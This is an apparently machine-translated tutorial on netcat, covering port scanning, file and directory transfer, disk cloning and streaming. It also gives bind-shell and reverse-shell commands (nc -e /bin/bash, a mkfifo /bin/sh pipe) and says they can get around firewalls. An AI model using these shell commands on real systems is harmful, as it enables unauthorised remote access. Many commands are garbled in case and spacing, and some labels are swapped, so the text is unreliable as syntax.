Play Linux: Swiss Army knife Netcat in Web tools

Netcat is known as the Swiss Army Knife in the Network tool, which can read and write data through TCP and UDP on the network. By combining and redirecting with other tools, you can use it in a variety of ways in your script. It's amazing what you can do with the Netcat command.

What Netcat do is create a link between the two computers and return two data streams, and what you can do after that is your imagination. You can create a server, transfer files, chat with friends, stream streaming media, or use it as a standalone client for other protocols.

Here are some examples of using netcat.

A (172.31.100.7)

B (172.31.100.23)

Examples of Linux netcat commands:

1. Port Scan

Port scans are often used by system administrators and hackers to discover ports that are open on some machines to help them identify vulnerabilities in the system.

Nc-z-v-n 10.9.17.100 21-25 nc:connect to 10.9.17.100 port (TCP) Failed:connection refusedconnection to 10.9.17.100 Port [tcp/*] Succeeded!nc:connect to 10.9.17.100 port (TCP) Failed:connection refusednc:connect to 10.9.17.100 p ORT (TCP) Failed:connection refusednc:connect to 10.9.17.100 port (TCP) Failed:connection refused

Can be run in TCP or UDP mode, by default the Tcp,-u parameter is adjusted to UDP.

The z parameter tells Netcat to use 0 IO, close the connection immediately after the connection is successful, and no data exchange

The V parameter refers to the use of redundancy option (Translator Note: Verbose output)

The n parameter tells Netcat not to use DNS to reverse-query the domain name of the IP address

This command prints 21 to 25 of all open ports. Banner is a text that banner is a text message sent to you by a service that you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services will send banner.

Once you find the open ports, you can easily use the Netcat connection service to crawl their banner.

Nc-v 10.9.17.100 22Connection to 10.9.17.100 Port [Tcp/ssh] succeeded! Ssh-2.0-openssh_5.3protocol mismatch.

The Netcat command connects to open port 22 and prints the banner information that is running on this port.

2. Chat Server

If you want to talk to your friends, there are a lot of software and information services available for you to use. However, if you do not have such extravagant configuration, such as you in the computer lab, all the external connection is limited, how do you and all the friends sitting in the next room all day to communicate that? Don't be depressed, Netcat provides a way for you to create a chat server, a pre-determined port, so that he can reach you.

Server

Nc-l 1567

The Netcat command initiates a TCP server on port 1567, and all standard outputs and inputs are output to that port. Both the output and the input are shown in this shell.

Client

NC 172.31.100.7 1567

Whatever you type on machine B will appear on machine A.

3. File Transfer

Most of the time, we are trying to transfer files over a network or other tool. There are many ways, like FTP,SCP,SMB and so on, but when you just need to transfer files temporarily or once, it's really worth wasting time installing and configuring a software on your machine. Suppose you want to pass a file file.txt from a to B. A or B can be a server or a client, the following, let a as a server, B is the client.

Server

Nc-l 1567 < < (seq 5)

Client

Nc-n 10.9.17.100 156712345

Here we create a server on a and redirect the input of netcat to file file.txt, then when any successful connection is made to that port, Netcat will send file contents.

At the client we redirect the output to File.txt, when B connects to A,a to send the file contents, B saves the file contents to file.txt.

There is no need to create a file source as a server, and we can use it in the opposite way. Like the following we send files from B to a, but the server is created on a, this time we only need to redirect the output of the netcat and redirect the input file of B.

B as Server

Server

Nc-l 1567 > File.txt

Client

NC 172.31.100.23 1567 < file.txt

4. Directory Transfer

Sending a file is simple, but if we want to send multiple files, or the entire directory, it is as simple as using the compression tool tar, compressed and send the compressed package.

If you want to transfer a directory over the network from A to B.

Server

Tar-cvf–dir_name | Nc-l 1567

Client

Nc-n 172.31.100.7 1567 | TAR-XVF-

Here on a server, we create a tar archive package and pass it-redirect it in the console, then use the pipeline, redirecting it to Netcat,netcat to send it over the network.

At the client we download the package through the Netcat pipeline and then open the file.

If you want to save bandwidth transfer compression packets, we can use bzip2 or other tools to compress.

Server

tar-cvf–dir_name| Bzip2-z | Nc-l 1567

Compression via BZIP2

Client

Nc-n 172.31.100.7 1567 | Bzip2-d |TAR-XVF-

Unzip with BZIP2

5. Encrypt the data you send over the network

If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.

Service side

NC localhost 1567 | Mcrypt–flush–bare-f-q-d-M ECB > file.txt

Encrypt data using the MCrypt tool.

Client

Mcrypt–flush–bare-f-q-m ECB < file.txt | Nc-l 1567

Use the MCrypt tool to decrypt the data.

The above two commands will prompt for a password, ensuring that the same password is used on both ends.

Here we use MCrypt to encrypt, use any other encryption tool can.

6. Streaming video

While not the best way to generate streaming video, if there are no specific tools on the server, using Netcat, we still have the hope of doing it.

Service side

Cat Video.avi | Nc-l 1567

Here we just read from a video file and redirect the output to the Netcat client

NC 172.31.100.7 1567 | MPLAYER-VO X11-cache 3000-

Here we read the data from the socket and redirect it to MPlayer.

7. Cloning a device

If you have installed a Linux machine and need to repeat the same operation to other machines, and you do not want to repeat the configuration again. Do not need to re-configure the installation process, just start another machine with some boot can drive the disk and clone your machine.

Cloning a Linux PC is simple, assuming your system is on disk/DEV/SDA

Server

DD IF=/DEV/SDA | Nc-l 1567

Client

Nc-n 172.31.100.7 1567 | DD OF=/DEV/SDA

DD is a tool that reads raw data from disk, I redirect its output through the NETCAT server to another machine and writes it to disk, and it copies all of the information along with the partitioned table. But if we have already partitioned and only need to clone the root partition, we can change SDA to sda1,sda2 according to the location of our system root partition. And so on.

8. Open a shell

We have used remote shell-with telnet and ssh, but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.

Suppose your netcat supports the-C-E parameter (default netcat)

Server

Note: If there is-e, it is required to have the version with-p dependent

[Email protected] 10.9.17.100 02:47:55 ~/tmp/10.2.3.5 >nc-lp 1567-e '/bin/bash-i '

Client

[Email protected] 10.9.17.101 02:47:45 ~/tmp/10.2.3.5 >nc 10.9.17.100 1567bash:. Host_name:no such file or directory--------------------------------------------------------------------Welcome to  you:10.2.3.5! Your login dir is:/root/tmp/10.2.3.5!--------------------------------------------------------------------[email Protected] 10.9.17.100 02:48:06 ~/tmp/10.2.3.5 >

Here we have created a NETCAT server and indicated that it was executed when it was successfully connected/bin/bash

If Netcat does not support the-C or-e parameter (OpenBSD netcat), we can still create a remote shell

Server

Mkfifo/tmp/tmp_fifocat/tmp/tmp_fifo | /bin/sh-i 2>&1 | Nc-l 1567 >/tmp/tmp_fifo

Here we create a FIFO file and then use the Pipeline command to direct the FIFO file content to the shell 2>&1. is used to redirect standard error output and standard output, and then pipe to Netcat to run on port 1567. At this point, we have redirected the output of Netcat to the FIFO file.

Description

Input received from the network is written to the FIFO file

The Cat command reads the FIFO file and sends its contents to the SH command

The SH command process receives input and writes it back to Netcat.

Netcat send output to client via network

As to why it succeeds because the pipeline executes the command in parallel, the FIFO file is used to replace the normal file because the FIFO makes the read wait and if it is a normal file, the cat command ends as soon as possible and begins to read the empty file.

Simply connect to the server on the client

Client

Nc-n 172.31.100.7 1567

You will get a shell prompt on the client

9. Reverse Shell

A reverse shell is a shell that opens on a client. The reverse shell is named because it differs from other configurations, where the server uses the services provided by the customer.

Service side

[Email protected] 10.9.17.100 02:44:34 ~/tmp/10.2.3.5 >nc-l-P 1567hostnameecdata-slave-01

On the client side, simply tell Netcat to execute the shell after the connection is complete.

Client

[Email protected] 10.9.17.101 02:44:36 ~/tmp/10.2.3.5 >nc-v 10.9.17.100 1567-e/bin/bash echo 111ecdata-master [10.9. 17.100] 1567 (JLICELMD) Open

Now, what's so special about the reverse shell?

The reverse shell is often used to circumvent firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7, and I use a proxy server to connect to the external network. If I want to access this machine from outside the network such as 1.2.3.4 Shell, then I will use the reverse shell for this purpose.

10. Specify the source port

Suppose your firewall filters all the ports except the 25 port, you need to specify the source port using the-P option.

Server-side

Nc-l 1567

Client

NC 172.31.100.7 1567-p 25

Using a port within 1024 requires root access.

This command will open port 25 for communication on the client, otherwise the random port will be used.

11. Specify the source address

Suppose your machine has multiple addresses, and you want to explicitly specify which address to use for external data traffic. We can use the-s option in Netcat to specify the IP address.

Server-side

Nc-u-L 1567 < file.txt

Client

Nc-u 172.31.100.7 1567-s 172.31.100.5 > File.txt

The command binds the address 172.31.100.5.

This is just some examples of using netcat.

Other uses include:

Use the-t option to impersonate the Telnet client,

The HTTP client is used to download files,

Connect to the mail server, use the SMTP protocol to check messages,

Use FFmpeg to intercept screens and share them via streaming, and more. Other more uses.

Simply put, you can use Netcat as a network communication medium to implement various clients as long as you understand the protocol.

12, Refer:

[1] netcat Manual

Http://linux.die.net/man/1/nc

[2] Linux Netcat command–the Swiss Army Knife of networking

http://mylinuxbook.com/linux-netcat-command/

Play Linux: Swiss Army knife Netcat in Web tools